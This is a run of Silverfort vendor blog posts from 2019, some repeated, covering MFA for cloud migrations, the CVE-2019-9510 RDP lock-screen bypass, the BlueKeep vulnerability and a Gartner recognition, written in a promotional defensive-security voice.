Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2019-06-26 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations/ With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is no doubt that the introduction of trends like cloud, IoT and BYOD are changing our networks, dissolving the perimeters we used to have. In this reality, ensuring the security of enterprise systems that are migrated to the cloud can be a challenge and in some cases, put on hold the migration of homegrown and legacy systems. When planning to migrate a homegrown or legacy application to the cloud, many organizations choose the ‘lift and shift’ approach. The advantages of the ‘Lift-and-Shift’ approach are clear because it means that the application and its associated data are migrated to the cloud with minimal or no changes. You “lifted” the application from its existing environments and “shifted” it as-is to the cloud. This means that there won’t be any significant changes to the application architecture, data flow, or authentication mechanisms. Securing Access to Migrated Applications Many have concerns regarding the security of migrated applications in the cloud. Some of these concerns are justified: In a 2018 Cloud Security Report from Crowd Research Partners, 84% said their traditional security solutions either don’t work at all in cloud environments or will have only limited functionality. 43% of cybersecurity professionals said they struggle with visibility into cloud infrastructure security, 38% struggled with compliance, and 35% struggled to apply consistent security policies across cloud and on-premises environments. 55% said that their biggest perceived threats to cloud security were unauthorized access through misuse of employee credentials and improper access controls. These concerns are justified when our homegrown and legacy applications rely on password-only authentication. While running in on-premises data centers, traditional defense layers provided additional protection. If the same security controls aren’t available when running these systems in the cloud, they become inherently more vulnerable. In some cases, adjustments to traditional security controls can be made to the system with some code changes. In other cases, such changes are impractical. 5 things that can help with a smooth and secure migration of on-premises servers and applications to the cloud Here are five things to keep in mind when planning a migration of on-premises homegrown and legacy systems to the cloud: Mapping dependencies before moving the app to the cloud Successful application migration requires a detailed understanding of how all of your applications and servers are communicating. To map dependencies, you first need to discover how all machines and applications in your infrastructure are communicating with each other, including any Shadow IT, e. g. servers and systems implemented by various business units, that your IT is not aware of. If your applications have any dependencies on Shadow IT, it must be incorporated into your migration plan. Without mapping all dependencies first, your applications are likely to break. Securing authentication to migrated applications Securing access to enterprise systems is a top priority whether an application is running on-premises or in the cloud. After all, it doesn’t really matter where the application is running - if it relies of password authentication it can be exposed to unauthorized access. And if you obtain an administrator password, which enables full access and control over the application and its infrastructure, you can steal data or make whatever changes you want. The only difference is that when an application is running in the cloud, it may not be protected by the traditional security defense layers that would defend applications on premises. However, there are cloud security defenses that can be applied. Adding multi-factor authentication for any migrated application, especially those that rely on password-only authentication mechanisms, provides a critical security control and ensures that only authorized users can log into the application. (There is a caveat: if you are doing a ‘shift-and-lift’ migration of a homegrown or legacy system, it would probably be a challenge to apply mainstream MFA solutions. A next-generation authentication solution will better support these apps. ) Adding access policies (deny or grant access): Most applications apply role-based access controls on users after they logged into the application. However, in some cases, these may not be enough. For example, you may want a policy that says that a user may not log into the application from an unauthorized device, or from an untrusted location. In that case, access controls should be applied at the access request level. By applying secure authentication it is possible to apply effective access control to deny or allow access based on the source of the request, the user, the device used and other parameters before the user logs into the system. Auditing all access: If you have concerns regarding unauthorized access, it’s important to keep track of any access attempts to your sensitive resources and to have the ability to put them in the proper context. First of all, a consolidated audit trail can help us understand which users are accessing our sensitive resources and how they are accessing them, to detect both internal and external threats. When looking to minimize access rights to ‘least privileges’, meaning limiting a user’s access rights to the bare minimum permissions he/she needs to perform their work, an audit trail helps us verify if a user is currently using or not using all his/her access rights. In addition, understanding what other resources a user is accessing can help us associate the user with a community of similar users, and predict if he/she might need to access additional resources. Or, if the user is accessing different resources than his peers, an audit trail can help us identify this anomaly which may require further investigation. Unified security policies: Migrating homegrown and legacy systems to the cloud is typically a long process and may take years. This is why it’s often done in a phased approach, and involves applications that run in hybrid environments. Many organizations already have some hybrid environments, and Gartner estimates that by 2020, 90% of Organizations will adopt hybrid infrastructure management. Managing security policies across hybrid environments in a unified manner not only simplifies these processes but also ensures improved and consistent protection. How can Silverfort help? Silverfort’s next-generation authentication platform was designed to meet the needs of our modern networks. Unlike mainstream MFA solutions, it doesn’t require deployment of software agents or proxies, or any integration with the protected systems. This makes it uniquely suitable for securing homegrown and legacy applications whether they are running on-premises or while migrating them to the cloud. Before migrating the application, Silverfort automatically maps out dependencies - a critical step in ensuring a smooth migration without ‘breaking’ the application. Then it can seamlessly add MFA to the system and ensure secure access, without requiring any changes to it, its supporting infrastructure or network. Silverfort continuously monitors and audits all access requests across on-premises, cloud, and hybrid environments. The consolidated audit trail details both user-to-machine and machine-to-machine access activities and is further analyzed by Silverfort’s AI-driven risk engine to automatically identify behavior anomalies and known malicious access patterns, like brute force attacks, ransomware, lateral movement attacks (e. g. pass-the-hash) and more. Finally, Silverfort enables you to manage MFA and access policies across all your enterprise environments from a unified console, simplifying the implementation and reducing ongoing maintenance costs. By Dana Tamir, VP Market Strategy, Silverfort Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! --- - Published: 2019-06-26 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations-2/ With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is no doubt that the introduction of trends like cloud, IoT and BYOD are changing our networks, dissolving the perimeters we used to have. In this reality, ensuring the security of enterprise systems that are migrated to the cloud can be a challenge and in some cases, put on hold the migration of homegrown and legacy systems. When planning to migrate a homegrown or legacy application to the cloud, many organizations choose the ‘lift and shift’ approach. The advantages of the ‘Lift-and-Shift’ approach are clear because it means that the application and its associated data are migrated to the cloud with minimal or no changes. You “lifted” the application from its existing environments and “shifted” it as-is to the cloud. This means that there won’t be any significant changes to the application architecture, data flow, or authentication mechanisms. Securing Access to Migrated Applications Many have concerns regarding the security of migrated applications in the cloud. Some of these concerns are justified: In a 2018 Cloud Security Report from Crowd Research Partners, 84% said their traditional security solutions either don’t work at all in cloud environments or will have only limited functionality. 43% of cybersecurity professionals said they struggle with visibility into cloud infrastructure security, 38% struggled with compliance, and 35% struggled to apply consistent security policies across cloud and on-premises environments. 55% said that their biggest perceived threats to cloud security were unauthorized access through misuse of employee credentials and improper access controls. These concerns are justified when our homegrown and legacy applications rely on password-only authentication. While running in on-premises data centers, traditional defense layers provided additional protection. If the same security controls aren’t available when running these systems in the cloud, they become inherently more vulnerable. In some cases, adjustments to traditional security controls can be made to the system with some code changes. In other cases, such changes are impractical. 5 things that can help with a smooth and secure migration of on-premises servers and applications to the cloud Here are five things to keep in mind when planning a migration of on-premises homegrown and legacy systems to the cloud: Mapping dependencies before moving the app to the cloud Successful application migration requires a detailed understanding of how all of your applications and servers are communicating. To map dependencies, you first need to discover how all machines and applications in your infrastructure are communicating with each other, including any Shadow IT, e. g. servers and systems implemented by various business units, that your IT is not aware of. If your applications have any dependencies on Shadow IT, it must be incorporated into your migration plan. Without mapping all dependencies first, your applications are likely to break. Securing authentication to migrated applications Securing access to enterprise systems is a top priority whether an application is running on-premises or in the cloud. After all, it doesn’t really matter where the application is running - if it relies of password authentication it can be exposed to unauthorized access. And if you obtain an administrator password, which enables full access and control over the application and its infrastructure, you can steal data or make whatever changes you want. The only difference is that when an application is running in the cloud, it may not be protected by the traditional security defense layers that would defend applications on premises. However, there are cloud security defenses that can be applied. Adding multi-factor authentication for any migrated application, especially those that rely on password-only authentication mechanisms, provides a critical security control and ensures that only authorized users can log into the application. (There is a caveat: if you are doing a ‘shift-and-lift’ migration of a homegrown or legacy system, it would probably be a challenge to apply mainstream MFA solutions. A next-generation authentication solution will better support these apps. ) Adding access policies (deny or grant access): Most applications apply role-based access controls on users after they logged into the application. However, in some cases, these may not be enough. For example, you may want a policy that says that a user may not log into the application from an unauthorized device, or from an untrusted location. In that case, access controls should be applied at the access request level. By applying secure authentication it is possible to apply effective access control to deny or allow access based on the source of the request, the user, the device used and other parameters before the user logs into the system. Auditing all access: If you have concerns regarding unauthorized access, it’s important to keep track of any access attempts to your sensitive resources and to have the ability to put them in the proper context. First of all, a consolidated audit trail can help us understand which users are accessing our sensitive resources and how they are accessing them, to detect both internal and external threats. When looking to minimize access rights to ‘least privileges’, meaning limiting a user’s access rights to the bare minimum permissions he/she needs to perform their work, an audit trail helps us verify if a user is currently using or not using all his/her access rights. In addition, understanding what other resources a user is accessing can help us associate the user with a community of similar users, and predict if he/she might need to access additional resources. Or, if the user is accessing different resources than his peers, an audit trail can help us identify this anomaly which may require further investigation. Unified security policies: Migrating homegrown and legacy systems to the cloud is typically a long process and may take years. This is why it’s often done in a phased approach, and involves applications that run in hybrid environments. Many organizations already have some hybrid environments, and Gartner estimates that by 2020, 90% of Organizations will adopt hybrid infrastructure management. Managing security policies across hybrid environments in a unified manner not only simplifies these processes but also ensures improved and consistent protection. How can Silverfort help? Silverfort’s next-generation authentication platform was designed to meet the needs of our modern networks. Unlike mainstream MFA solutions, it doesn’t require deployment of software agents or proxies, or any integration with the protected systems. This makes it uniquely suitable for securing homegrown and legacy applications whether they are running on-premises or while migrating them to the cloud. Before migrating the application, Silverfort automatically maps out dependencies - a critical step in ensuring a smooth migration without ‘breaking’ the application. Then it can seamlessly add MFA to the system and ensure secure access, without requiring any changes to it, its supporting infrastructure or network. Silverfort continuously monitors and audits all access requests across on-premises, cloud, and hybrid environments. The consolidated audit trail details both user-to-machine and machine-to-machine access activities and is further analyzed by Silverfort’s AI-driven risk engine to automatically identify behavior anomalies and known malicious access patterns, like brute force attacks, ransomware, lateral movement attacks (e. g. pass-the-hash) and more. Finally, Silverfort enables you to manage MFA and access policies across all your enterprise environments from a unified console, simplifying the implementation and reducing ongoing maintenance costs. By Dana Tamir, VP Market Strategy, Silverfort Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! --- - Published: 2019-06-13 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability/ Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows servers. Microsoft was quick to dismiss the vulnerability. But however you look at it, with most MFA solutions, locked remote desktops can be unlocked due to this vulnerability without using MFA, even if MFA is enforced on the server. CERT said that there is no practical solution to the problem and recommended a few workarounds. In this post, we show how Silverfort can be used to overcome this vulnerability. The Vulnerability Explained The vulnerability is a result of a new behaviour of the RDP reconnection feature in Windows 10 1803 and Windows Server 2019. If Network Level Authentication (NLA) is enforced, the following sequence of events triggers the vulnerability: A similar sequence of events will lead to the vulnerability even if NLA is not enforced. The issue with these flows is that the user locked the remote desktop, but the attacker re-opened it without the user entering the password, based only on the Kerberos ticket. This flow remains the same even if an MFA solution is implemented for desktop logon. One would expect the remote desktop to require the user to re-enter their password and provide the second authentication factor to unlock the remote desktop. But this is not the case with the new RDP reconnection behaviour. The vulnerability has two main effects: The user reconnects to the server without re-entering the password. If an MFA solution protects Windows logon, rather than the underlying protocols Kerberos and NTLM, the user is not required for MFA to unlock the computer. This affects most MFA solutions. Easy to Reproduce To witness the vulnerability with your own eyes, try the following steps: Remote desktop to a windows 10 1803 Lock the remote desktop Disconnect the client device from the network Reconnect the client device You are back in the remote desktop session without reentering your password Why Silverfort is Unaffected Consider a remote desktop protected by Silverfort. Silverfort can protect any Kerberos service running on the remote desktop, including terminal services (termsrv). A policy in Silverfort can be set to require MFA every time a termsrv ticket is requested to the remote desktop. Now let's reconsider the sequence of events that led to the vulnerability, but this time with Silverfort: By requiring step up authentication for the Kerberos ticket request, in addition to the desktop logon, Silverfort is able to block the attack. Moral of the Story This vulnerability shows that it's not enough to have MFA for one interface of a system. All access points to a system should be protected with MFA to protect it from compromise. Further reading Vulnerability Note VU#576688 Microsoft's description of the RDP reconnection feature Microsoft's response Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2019-06-13 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability-2/ Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows servers. Microsoft was quick to dismiss the vulnerability. But however you look at it, with most MFA solutions, locked remote desktops can be unlocked due to this vulnerability without using MFA, even if MFA is enforced on the server. CERT said that there is no practical solution to the problem and recommended a few workarounds. In this post, we show how Silverfort can be used to overcome this vulnerability. The Vulnerability Explained The vulnerability is a result of a new behaviour of the RDP reconnection feature in Windows 10 1803 and Windows Server 2019. If Network Level Authentication (NLA) is enforced, the following sequence of events triggers the vulnerability: A similar sequence of events will lead to the vulnerability even if NLA is not enforced. The issue with these flows is that the user locked the remote desktop, but the attacker re-opened it without the user entering the password, based only on the Kerberos ticket. This flow remains the same even if an MFA solution is implemented for desktop logon. One would expect the remote desktop to require the user to re-enter their password and provide the second authentication factor to unlock the remote desktop. But this is not the case with the new RDP reconnection behaviour. The vulnerability has two main effects: The user reconnects to the server without re-entering the password. If an MFA solution protects Windows logon, rather than the underlying protocols Kerberos and NTLM, the user is not required for MFA to unlock the computer. This affects most MFA solutions. Easy to Reproduce To witness the vulnerability with your own eyes, try the following steps: Remote desktop to a windows 10 1803 Lock the remote desktop Disconnect the client device from the network Reconnect the client device You are back in the remote desktop session without reentering your password Why Silverfort is Unaffected Consider a remote desktop protected by Silverfort. Silverfort can protect any Kerberos service running on the remote desktop, including terminal services (termsrv). A policy in Silverfort can be set to require MFA every time a termsrv ticket is requested to the remote desktop. Now let's reconsider the sequence of events that led to the vulnerability, but this time with Silverfort: By requiring step up authentication for the Kerberos ticket request, in addition to the desktop logon, Silverfort is able to block the attack. Moral of the Story This vulnerability shows that it's not enough to have MFA for one interface of a system. All access points to a system should be protected with MFA to protect it from compromise. Further reading Vulnerability Note VU#576688 Microsoft's description of the RDP reconnection feature Microsoft's response Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2019-06-05 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure/ By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep vulnerability, which is also known as CVE-2019-0708. The patch fixes a critical Remote Code Execution vulnerability. According to Microsoft: “This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017. ” 1 Microsoft TechNet announcement about the patch for fixing CVE-2019-0708 Microsoft was quick to release the patch and is putting major efforts in to making sure their customers patch their systems. The severity of this vulnerability drove Microsoft to take the unusual step of issuing patches not only for current affected systems like Windows 10, Windows 7, Windows Server 2016, and Windows Server 2008 R2, but also for systems that are no longer supported like Windows 2003, Windows XP, and Windows Vista. Microsoft security officials say they are confident BlueKeep exploits already exist and may have the potential to trigger self-replicating attacks as destructive as the 2017 WannaCry attack that shut down computers all over the world. The BlueKeep vulnerability should be taken very seriously. This vulnerability can be exploited to achieve an initial foothold in a network by attacking internet exposed remote desktop servers, and it can also be used by attackers to move laterally in the network after obtaining this initial foothold. While applying this patch is of paramount importance, patching all servers in an organization can be a very difficult tasks for enterprises. It’s important to remember that even a single unpatched endpoint can enable a breach. Evidently, the EternalBlue vulnerability was exploited on a massive scale well after the patch was released by Microsoft. Partial exploits have already been released for the BlueKeep vulnerability, so it is just a matter of time before the vulnerability is widely used by attackers. Protecting Your Systems from the BlueKeep vulnerability: The first thing you should do is identify any unpatched or old operating systems in your network and patch all affected systems – this should be done as soon as possible! Next, you should use Network Level Authentication (NLA) where possible: NLA requires authentication before the vulnerability can be triggered. Microsoft strongly recommends this, yet it isn’t the default setting. 2 Enabling NLA to require authentication before the vulnerability can be triggered Enabling NLA prevents pre-authentication execution. However, it’s important to remember that affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. Preventing Exploitation of Compromised Credentials for Remote Code Execution with Silverfort As mentioned above, enabling NLA is critical for preventing the pre-authentication execution, but it’s not enough because if an attacker already has valid credentials (which are quite easy to get these days), the attacker and still gain access and exploit the RCE vulnerability. This is where Silverfort comes in and prevents the use of compromised credentials for RCE exploitation and other remote desktop protocol attacks:Silverfort’s agentless, proxyless authentication platform can enforce multi-factor authentication (MFA) and strong authentication policies to prevent unauthorized access to any system, no matter what it is or where it is – whether on-premises or in the cloud. This includes systems that couldn’t be protected by MFA solutions until today, like IT infrastructure, homegrown and legacy applications, file shares, databases, and more. When an attacker tries to exploit compromised credentials to gain access to a system, Silverfort can require a second authentication factor to validate the user’s identity. While legitimate users can easily authenticate, an attacker will fail the 2nd authentication factor and therefore his/her access will be denied. Silverfort can apply static MFA policies that require users to authenticate with a 2nd factor any time they access systems, but that can be quite disruptive. Therefore, risk-based adaptive policies are highly recommended: Adaptive policies can be set to require a 2nd authentication factor only when risk levels are high – this helps minimize disruptions without compromising security. To read more about Silverfort’s adaptive policies and AI-based Risk Engine download this free whitepaper. 3 Silverfort can apply static MFA policies or risk-based adaptive authentication policies Stopping Lateral Movement with Zero-Trust Security Policies Silverfort can enforce MFA and secure access not only for external access, but also inside corporate networks. This includes both user-to-machine access and machine-to-machine access (service accounts). Service accounts are used by various corporate systems to communicate with other systems and automate processes. Such accounts are a prime target for attackers, since they are often equipped with high privileges and their passwords are rarely changed. But because these accounts are used by machines, rather than humans, they cannot be protected with regular multi-factor authentication methods. Silverfort introduces a unique capability for securing the use of service accounts, which prevents unauthorized entities from stealing or misusing them. This is achieved without any change to the relevant systems. Silverfort enables organizations to implement a holistic zero-trust security model without deploying software agents or proxies, and without requiring changes to existing networks. Its innovative architecture ensures secure access to any system, no matter where it is, or what it is. This includes user-to-machine and machine-to-machine access, as well as any administrative access. Because Silverfort avoids any modifications to existing assets and infrastructure, it allows not only small agile companies but also large traditional enterprises to achieve zero trust security throughout their networks. Yaron Kassner, CTO and Co Founder, SilverfortSilverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. Want to learn more or see a demo? – Contact us today! --- - Published: 2019-05-29 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor/ By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management (IAM). Needless to say, we are thrilled and very honored to receive such recognition. Gartner’s report explains that “Digital businesses must achieve a great user experience, and support digital transformation and optimization as well as the shift of workloads to the cloud. ” We completely agree. Corporate networks are going through dramatic changes in recent years, due to IT revolutions such as the cloud, Internet of Things (IoT), Bring Your Own Device (BYOD) and more. In this new reality, with countless devices and services that are all connected to each other without clear perimeters, traditional authentication solutions become irrelevant, and a new approach is needed. What's So Cool About Silverfort? We attribute Silverfort’s rise as a Next-Generation Authentication vendor to the following factors: It’s agentless: Yes, that’s true! Silverfort can enforce secure access to any system, no matter where it is, or what it is, without installing software agents on it and without requiring code changes. This means that it’s not only simple to deploy, but it also automatically protects new assets or shadow IT systems without having to integrate with them one by one. It doesn’t require proxies and doesn’t need to decrypt network traffic: Silverfort is not deployed as a proxy between the users and the applications or resources they are accessing. That’s because proxies assume there is some perimeter where they can monitor user access. In today's enterprises, where so many connected users, devices and systems, on-premises and in the cloud, perimeters dissolve and deploying proxies becomes impossible. We believe that this is a major barrier: Where will you deploy a proxy to capture all user-to-machine and machine-to-machine interactions across the different environment, and within each environment? Silverfort’s innovative architecture removes the need to answer this difficult question. To do that, we had to overcome another challenge that was thought to be impossible – analyzing encrypted authentication protocols without decrypting the traffic. It can secure authentication and access to any sensitive system, including those considered ‘unprotectable’ until today: By eliminating the need for agents, proxies or code changes, Silverfort can enable secure authentication (including MFA and adaptive authentication) for any system. This includes systems that could not be protected until today, like homegrown and legacy applications, critical IT infrastructure (hypervisors, DCs), IoT devices, SCADA servers, healthcare systems like PACS and EHR, dynamic IaaS environments, PCI servers, databases, file shares and more. It enables enterprises to achieve Zero Trust security without rebuilding their networks: As traditional network perimeters dissolve, identity and access management is becoming the new perimeter. More and more organizations look to Zero Trust as a solution, because they can no longer assume internal users are trusted. However, implementing a Zero Trust architecture usually requires companies to rebuild their network. Silverfort’s agentless and proxyless architecture is the first to enable identity-based Zero Trust security without this need, making it simple and achievable for any enterprise. It leverages an AI-Driven Risk Engine to continuously analyze risk and trust: Due to the holistic nature of Silverfort’s architecture, it continuously monitors all the access activities of all users and systems, analyzing 20x-50x more access activity than any other authentication solution. To continuously analyze all access activity, as well as external threat indicators provided by other security solutions, Silverfort leverages a first-of-its-kind AI-Driven Risk Engine. Silverfort’s Risk Engine continuously profiles and analyzes user behaviors using machine learning and reinforcement learning to apply the most accurate MFA and access policies. It can detect and block threats in real-time: Silverfort’s AI-Driven Risk Engine can detect a wide range of threats in real time, including behavior anomalies as well as known malicious patterns like brute-force attacks, lateral movement (e. g. Pass the Hash), ransomware and more. Using adaptive policies, it can block access or require users to authenticate with a 2nd factor before allowing them to continue with high-risk access. Silverfort step-up authentication can also be triggered by external threat indicators sent by other security products (including Palo Alto Networks, Check Point, Microsoft and others). So, if your firewall detected a suspicious user or device, Silverfort can now step-up the authentication for any attempt to access any system, even when coming from inside the perimeter. It lets organizations maximize security while minimizing disruptions: Today, organizations are struggling to deal with the high number of false-positive alerts. Blocking users because of false positive alerts is very disruptive and puts a lot of pressure on the SOC and helpdesk, but at the same time it’s crucial to block actual threats. Silverfort enables organizations to step-up the authentication requirements in response to real-time threats and allow access only to verified users. This dramatically reduces overhead for the SOC and helpdesk. So, the result is better response with less disruptions to your users and business. We can continue listing more benefits and advantages, but why don’t you see for yourself?  Contact us today to schedule a demo - we would love to show you more. Dana Tamir, VP Market Strategy, SilverfortDana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! --- - Published: 2019-05-29 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor-2/ By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management (IAM). Needless to say, we are thrilled and very honored to receive such recognition. Gartner’s report explains that “Digital businesses must achieve a great user experience, and support digital transformation and optimization as well as the shift of workloads to the cloud. ” We completely agree. Corporate networks are going through dramatic changes in recent years, due to IT revolutions such as the cloud, Internet of Things (IoT), Bring Your Own Device (BYOD) and more. In this new reality, with countless devices and services that are all connected to each other without clear perimeters, traditional authentication solutions become irrelevant, and a new approach is needed. What's So Cool About Silverfort? We attribute Silverfort’s rise as a Next-Generation Authentication vendor to the following factors: It’s agentless: Yes, that’s true! Silverfort can enforce secure access to any system, no matter where it is, or what it is, without installing software agents on it and without requiring code changes. This means that it’s not only simple to deploy, but it also automatically protects new assets or shadow IT systems without having to integrate with them one by one. It doesn’t require proxies and doesn’t need to decrypt network traffic: Silverfort is not deployed as a proxy between the users and the applications or resources they are accessing. That’s because proxies assume there is some perimeter where they can monitor user access. In today's enterprises, where so many connected users, devices and systems, on-premises and in the cloud, perimeters dissolve and deploying proxies becomes impossible. We believe that this is a major barrier: Where will you deploy a proxy to capture all user-to-machine and machine-to-machine interactions across the different environment, and within each environment? Silverfort’s innovative architecture removes the need to answer this difficult question. To do that, we had to overcome another challenge that was thought to be impossible – analyzing encrypted authentication protocols without decrypting the traffic. It can secure authentication and access to any sensitive system, including those considered ‘unprotectable’ until today: By eliminating the need for agents, proxies or code changes, Silverfort can enable secure authentication (including MFA and adaptive authentication) for any system. This includes systems that could not be protected until today, like homegrown and legacy applications, critical IT infrastructure (hypervisors, DCs), IoT devices, SCADA servers, healthcare systems like PACS and EHR, dynamic IaaS environments, PCI servers, databases, file shares and more. It enables enterprises to achieve Zero Trust security without rebuilding their networks: As traditional network perimeters dissolve, identity and access management is becoming the new perimeter. More and more organizations look to Zero Trust as a solution, because they can no longer assume internal users are trusted. However, implementing a Zero Trust architecture usually requires companies to rebuild their network. Silverfort’s agentless and proxyless architecture is the first to enable identity-based Zero Trust security without this need, making it simple and achievable for any enterprise. It leverages an AI-Driven Risk Engine to continuously analyze risk and trust: Due to the holistic nature of Silverfort’s architecture, it continuously monitors all the access activities of all users and systems, analyzing 20x-50x more access activity than any other authentication solution. To continuously analyze all access activity, as well as external threat indicators provided by other security solutions, Silverfort leverages a first-of-its-kind AI-Driven Risk Engine. Silverfort’s Risk Engine continuously profiles and analyzes user behaviors using machine learning and reinforcement learning to apply the most accurate MFA and access policies. It can detect and block threats in real-time: Silverfort’s AI-Driven Risk Engine can detect a wide range of threats in real time, including behavior anomalies as well as known malicious patterns like brute-force attacks, lateral movement (e. g. Pass the Hash), ransomware and more. Using adaptive policies, it can block access or require users to authenticate with a 2nd factor before allowing them to continue with high-risk access. Silverfort step-up authentication can also be triggered by external threat indicators sent by other security products (including Palo Alto Networks, Check Point, Microsoft and others). So, if your firewall detected a suspicious user or device, Silverfort can now step-up the authentication for any attempt to access any system, even when coming from inside the perimeter. It lets organizations maximize security while minimizing disruptions: Today, organizations are struggling to deal with the high number of false-positive alerts. Blocking users because of false positive alerts is very disruptive and puts a lot of pressure on the SOC and helpdesk, but at the same time it’s crucial to block actual threats. Silverfort enables organizations to step-up the authentication requirements in response to real-time threats and allow access only to verified users. This dramatically reduces overhead for the SOC and helpdesk. So, the result is better response with less disruptions to your users and business. We can continue listing more benefits and advantages, but why don’t you see for yourself?  Contact us today to schedule a demo - we would love to show you more. Dana Tamir, VP Market Strategy, SilverfortDana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! --- - Published: 2019-05-05 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure-2/ By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep vulnerability, which is also known as CVE-2019-0708. The patch fixes a critical Remote Code Execution vulnerability. According to Microsoft: “This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017. ” 1 Microsoft TechNet announcement about the patch for fixing CVE-2019-0708 Microsoft was quick to release the patch and is putting major efforts in to making sure their customers patch their systems. The severity of this vulnerability drove Microsoft to take the unusual step of issuing patches not only for current affected systems like Windows 10, Windows 7, Windows Server 2016, and Windows Server 2008 R2, but also for systems that are no longer supported like Windows 2003, Windows XP, and Windows Vista. Microsoft security officials say they are confident BlueKeep exploits already exist and may have the potential to trigger self-replicating attacks as destructive as the 2017 WannaCry attack that shut down computers all over the world. The BlueKeep vulnerability should be taken very seriously. This vulnerability can be exploited to achieve an initial foothold in a network by attacking internet exposed remote desktop servers, and it can also be used by attackers to move laterally in the network after obtaining this initial foothold. While applying this patch is of paramount importance, patching all servers in an organization can be a very difficult tasks for enterprises. It’s important to remember that even a single unpatched endpoint can enable a breach. 